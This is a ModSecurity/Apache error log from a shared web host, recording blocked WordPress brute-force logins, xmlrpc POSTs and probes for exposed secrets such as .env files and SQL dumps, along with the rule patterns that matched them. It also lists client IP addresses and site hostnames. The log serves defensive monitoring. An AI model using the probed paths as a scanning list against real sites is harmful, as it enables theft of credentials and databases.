[Tue May 26 18:47:06.213915 2026] [security2:error] [pid 1025417:tid 1025613] [client 195.2.84.198:59528] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "406"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWdUlHbArxonFeMXvQhyAAAAEI"], referer: https://www.bloggertarget.com/100-best-free-latest-directory-submission-list/
[Tue May 26 18:47:06.563874 2026] [security2:error] [pid 1025417:tid 1025421] [remote 78.142.18.172:49146] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 172.18.142.78.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWdUlHbArxonFeMXvQhzQAALAM"]
[Tue May 26 18:47:06.848944 2026] [security2:error] [pid 1025417:tid 1025532] [remote 78.142.18.172:49146] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 172.18.142.78.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWdUlHbArxonFeMXvQh2AAAG3I"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:47:07.058453 2026] [security2:error] [pid 1025417:tid 1025424] [remote 45.148.10.5:61680] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/database.sql"] [unique_id "ahWdU1HbArxonFeMXvQh4gAADgY"]
[Tue May 26 18:47:07.379951 2026] [security2:error] [pid 1025417:tid 1025601] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdUlHbArxonFeMXvQh3gAAADY"]
[Tue May 26 18:47:07.729711 2026] [security2:error] [pid 1025417:tid 1025425] [remote 45.148.10.5:61680] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/dump.sql"] [unique_id "ahWdU1HbArxonFeMXvQh8wAAFgc"]
[Tue May 26 18:47:07.797681 2026] [security2:error] [pid 1025417:tid 1025541] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/config/environments/production.rb"] [unique_id "ahWdU1HbArxonFeMXvQh9AAAU3s"]
[Tue May 26 18:47:08.394841 2026] [security2:error] [pid 1025417:tid 1025426] [remote 45.148.10.5:61680] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/backup.sql"] [unique_id "ahWdVFHbArxonFeMXvQiBwAAQAg"]
[Tue May 26 18:47:08.735281 2026] [security2:error] [pid 1025417:tid 1025434] [remote 66.116.199.98:38868] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 98.199.116.66.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWdVFHbArxonFeMXvQiCAAAPBA"]
[Tue May 26 18:47:09.113653 2026] [security2:error] [pid 1025417:tid 1025428] [remote 45.148.10.5:61680] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/db.sql"] [unique_id "ahWdVVHbArxonFeMXvQiGQAAewo"]
[Tue May 26 18:47:09.406492 2026] [security2:error] [pid 1025417:tid 1025437] [remote 66.116.199.98:38868] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 98.199.116.66.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWdVVHbArxonFeMXvQiKwAAXxM"], referer: https://bloggertarget.com/wp-login.php
[Tue May 26 18:47:09.816304 2026] [security2:error] [pid 1025417:tid 1025436] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/config/environments/staging.rb"] [unique_id "ahWdVVHbArxonFeMXvQiOAAACBI"]
[Tue May 26 18:47:10.052767 2026] [security2:error] [pid 1025417:tid 1025655] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdVVHbArxonFeMXvQiLgAAAGw"]
[Tue May 26 18:47:10.907068 2026] [security2:error] [pid 1025417:tid 1025570] [client 45.189.61.223:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdVlHbArxonFeMXvQiRQAAABc"]
[Tue May 26 18:47:11.066744 2026] [security2:error] [pid 1025417:tid 1025445] [remote 193.37.33.216:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 216.33.37.193.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahWdVlHbArxonFeMXvQiUgAADhs"]
[Tue May 26 18:47:11.688037 2026] [security2:error] [pid 1025417:tid 1025444] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/wp-content/w3tc-config/master-preview.php"] [unique_id "ahWdV1HbArxonFeMXvQiaQAABho"]
[Tue May 26 18:47:12.460471 2026] [security2:error] [pid 1025417:tid 1025674] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdWFHbArxonFeMXvQibwAAAH8"]
[Tue May 26 18:47:12.904703 2026] [security2:error] [pid 1025417:tid 1025640] [client 162.243.41.33:59838] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "stockmarketanalysis.jiyani.in"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahWdWFHbArxonFeMXvQiiwAAAF0"]
[Tue May 26 18:47:12.934412 2026] [security2:error] [pid 1025417:tid 1025453] [remote 216.73.216.30:30688] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/sitemap.xml"] [unique_id "ahWdWFHbArxonFeMXvQihgAAHyM"]
[Tue May 26 18:47:13.085035 2026] [security2:error] [pid 1025417:tid 1025558] [client 162.243.41.33:64385] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "stockmarketanalysis.jiyani.in"] [uri "/website/wp-includes/wlwmanifest.xml"] [unique_id "ahWdWVHbArxonFeMXvQilAAAAAs"]
[Tue May 26 18:47:13.279683 2026] [security2:error] [pid 1025417:tid 1025619] [client 162.243.41.33:64478] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "stockmarketanalysis.jiyani.in"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahWdWVHbArxonFeMXvQilwAAAEg"]
[Tue May 26 18:47:13.330113 2026] [security2:error] [pid 1025417:tid 1025449] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWdWVHbArxonFeMXvQilQAAaB8"]
[Tue May 26 18:47:13.330311 2026] [security2:error] [pid 1025417:tid 1025651] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWdWVHbArxonFeMXvQilQAAaB8"]
[Tue May 26 18:47:13.597887 2026] [security2:error] [pid 1025417:tid 1025456] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/wp-content/w3tc-config/master.php"] [unique_id "ahWdWVHbArxonFeMXvQiogAAGSY"]
[Tue May 26 18:47:14.298004 2026] [security2:error] [pid 1025417:tid 1025462] [remote 103.91.67.202:34638] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 202.67.91.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWdWlHbArxonFeMXvQiqgAAMCw"]
[Tue May 26 18:47:14.500976 2026] [security2:error] [pid 1025417:tid 1025576] [client 185.191.171.14:61848] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/winter/list/"] [unique_id "ahWdWlHbArxonFeMXvQiuwAAAB0"]
[Tue May 26 18:47:14.501094 2026] [security2:error] [pid 1025417:tid 1025576] [client 185.191.171.14:61848] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/winter/list/"] [unique_id "ahWdWlHbArxonFeMXvQiuwAAAB0"]
[Tue May 26 18:47:14.809116 2026] [security2:error] [pid 1025417:tid 1025461] [remote 103.91.67.202:34638] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 202.67.91.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWdWlHbArxonFeMXvQiwgAAfis"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:47:15.088189 2026] [security2:error] [pid 1025417:tid 1025573] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdWlHbArxonFeMXvQivgAAABo"]
[Tue May 26 18:47:15.443309 2026] [security2:error] [pid 1025417:tid 1025467] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/.shared/.env"] [unique_id "ahWdW1HbArxonFeMXvQi1gAAcDE"]
[Tue May 26 18:47:17.035417 2026] [security2:error] [pid 1025417:tid 1025477] [remote 216.73.216.30:30688] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/sitemap.xml"] [unique_id "ahWdXVHbArxonFeMXvQi9wAAHTs"]
[Tue May 26 18:47:17.306768 2026] [security2:error] [pid 1025417:tid 1025480] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/system/.env"] [unique_id "ahWdXVHbArxonFeMXvQjAAAAaz4"]
[Tue May 26 18:47:17.664107 2026] [security2:error] [pid 1025417:tid 1025634] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdXVHbArxonFeMXvQi_QAAAFc"]
[Tue May 26 18:47:19.134420 2026] [security2:error] [pid 1025417:tid 1025500] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/api/src/.env"] [unique_id "ahWdX1HbArxonFeMXvQjQgAAFFI"]
[Tue May 26 18:47:20.303314 2026] [security2:error] [pid 1025417:tid 1025648] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdX1HbArxonFeMXvQjaAAAAGU"]
[Tue May 26 18:47:20.976958 2026] [security2:error] [pid 1025417:tid 1025517] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/.env_mail_server"] [unique_id "ahWdYFHbArxonFeMXvQjgwAAB2M"]
[Tue May 26 18:47:22.037938 2026] [security2:error] [pid 1025417:tid 1025526] [remote 216.73.216.30:30688] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/sitemap.xml"] [unique_id "ahWdYlHbArxonFeMXvQjmQAAO2w"]
[Tue May 26 18:47:22.067564 2026] [security2:error] [pid 1025417:tid 1025644] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdYVHbArxonFeMXvQjjwAAAGE"]
[Tue May 26 18:47:22.460323 2026] [security2:error] [pid 1025417:tid 1025647] [client 162.243.41.33:64587] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "stockmarketanalysis.jiyani.in"] [uri "/news/wp-includes/wlwmanifest.xml"] [unique_id "ahWdYlHbArxonFeMXvQjpQAAAGQ"]
[Tue May 26 18:47:23.111322 2026] [security2:error] [pid 1025417:tid 1025419] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/project/.env"] [unique_id "ahWdY1HbArxonFeMXvQjtQAALwE"]
[Tue May 26 18:47:23.853205 2026] [security2:error] [pid 1025417:tid 1025527] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWdY1HbArxonFeMXvQjzAAAYG0"]
[Tue May 26 18:47:23.853378 2026] [security2:error] [pid 1025417:tid 1025643] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWdY1HbArxonFeMXvQjzAAAYG0"]
[Tue May 26 18:47:24.926166 2026] [ssl:error] [pid 1025417:tid 1025530] [remote 186.42.103.6:55872] AH02032: Hostname blog.jhonweb.com provided via SNI and hostname www.jhonweb.com provided via HTTP have no compatible SSL setup for policy 'secure', referer: https://blog.jhonweb.com/
[Tue May 26 18:47:25.229925 2026] [security2:error] [pid 1025417:tid 1025645] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdZFHbArxonFeMXvQj4gAAAGI"]
[Tue May 26 18:47:25.542099 2026] [security2:error] [pid 1025417:tid 1025532] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/.env.development"] [unique_id "ahWdZVHbArxonFeMXvQkBQAAFHI"]
[Tue May 26 18:47:25.653995 2026] [security2:error] [pid 1025417:tid 1025659] [client 106.219.164.100:19988] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.hotsalesretail.com"] [uri "/index.php"] [unique_id "ahWdZVHbArxonFeMXvQkBwAAAHA"], referer: http://hotsalesretail.com
[Tue May 26 18:47:26.320648 2026] [security2:error] [pid 1025417:tid 1025422] [remote 79.143.178.15:53818] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 15.178.143.79.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWdZlHbArxonFeMXvQkFQAASwQ"]
[Tue May 26 18:47:26.363966 2026] [security2:error] [pid 1025417:tid 1025539] [remote 82.223.24.195:36326] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 195.24.223.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWdZlHbArxonFeMXvQkFgAAKXk"]
[Tue May 26 18:47:26.629951 2026] [security2:error] [pid 1025417:tid 1025638] [client 192.178.8.100:37805] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 100.8.178.192.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.samayikprasanga.in"] [uri "/epaper.php"] [unique_id "ahWdZlHbArxonFeMXvQkIQAAAFs"]
[Tue May 26 18:47:26.645002 2026] [security2:error] [pid 1025417:tid 1025606] [client 192.178.8.100:53612] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 100.8.178.192.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.samayikprasanga.in"] [uri "/epaper.php"] [unique_id "ahWdZlHbArxonFeMXvQkJQAAADs"]
[Tue May 26 18:47:27.331261 2026] [security2:error] [pid 1025417:tid 1025544] [remote 216.73.216.30:23236] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/sitemap.xml"] [unique_id "ahWdZ1HbArxonFeMXvQkNwAAQ34"]
[Tue May 26 18:47:27.515303 2026] [security2:error] [pid 1025417:tid 1025427] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/private/.env"] [unique_id "ahWdZ1HbArxonFeMXvQkOwAAFAk"]
[Tue May 26 18:47:28.005049 2026] [security2:error] [pid 1025417:tid 1025615] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdZ1HbArxonFeMXvQkPgAAAEQ"]
[Tue May 26 18:47:28.594363 2026] [core:error] [pid 1025417:tid 1025655] (13)Permission denied: [client 106.219.164.100:22985] AH00132: file permissions deny server access: /home1/hotsafa6/public_html/wp-content/plugins/contact-form-7/includes/js/index.js, referer: https://www.hotsalesretail.com/contact/
[Tue May 26 18:47:29.395604 2026] [security2:error] [pid 1025417:tid 1025448] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/user/.env.staging"] [unique_id "ahWdaVHbArxonFeMXvQkeAAAIB4"]
[Tue May 26 18:47:29.697931 2026] [security2:error] [pid 1025417:tid 1025584] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdaVHbArxonFeMXvQkcwAAACU"]
[Tue May 26 18:47:31.743351 2026] [security2:error] [pid 1025417:tid 1025446] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/doc/.env"] [unique_id "ahWda1HbArxonFeMXvQkrAAAdRw"]
[Tue May 26 18:47:32.589331 2026] [security2:error] [pid 1025417:tid 1025450] [remote 92.205.109.21:59656] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 21.109.205.92.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWdbFHbArxonFeMXvQktgAAEyA"]
[Tue May 26 18:47:32.786018 2026] [security2:error] [pid 1025417:tid 1025547] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdbFHbArxonFeMXvQkvAAAAAA"]
[Tue May 26 18:47:32.966918 2026] [security2:error] [pid 1025417:tid 1025459] [remote 216.73.216.30:1330] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/sitemap.xml"] [unique_id "ahWdbFHbArxonFeMXvQkxgAAByk"]
[Tue May 26 18:47:33.682747 2026] [security2:error] [pid 1025417:tid 1025452] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/.env.stage"] [unique_id "ahWdbVHbArxonFeMXvQk2QAAEiI"]
[Tue May 26 18:47:33.716042 2026] [security2:error] [pid 1025417:tid 1025642] [client 199.45.154.159:51080] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "tea.canopykaapi.com"] [uri "/index.php"] [unique_id "ahWdbVHbArxonFeMXvQk2gAAAF8"]
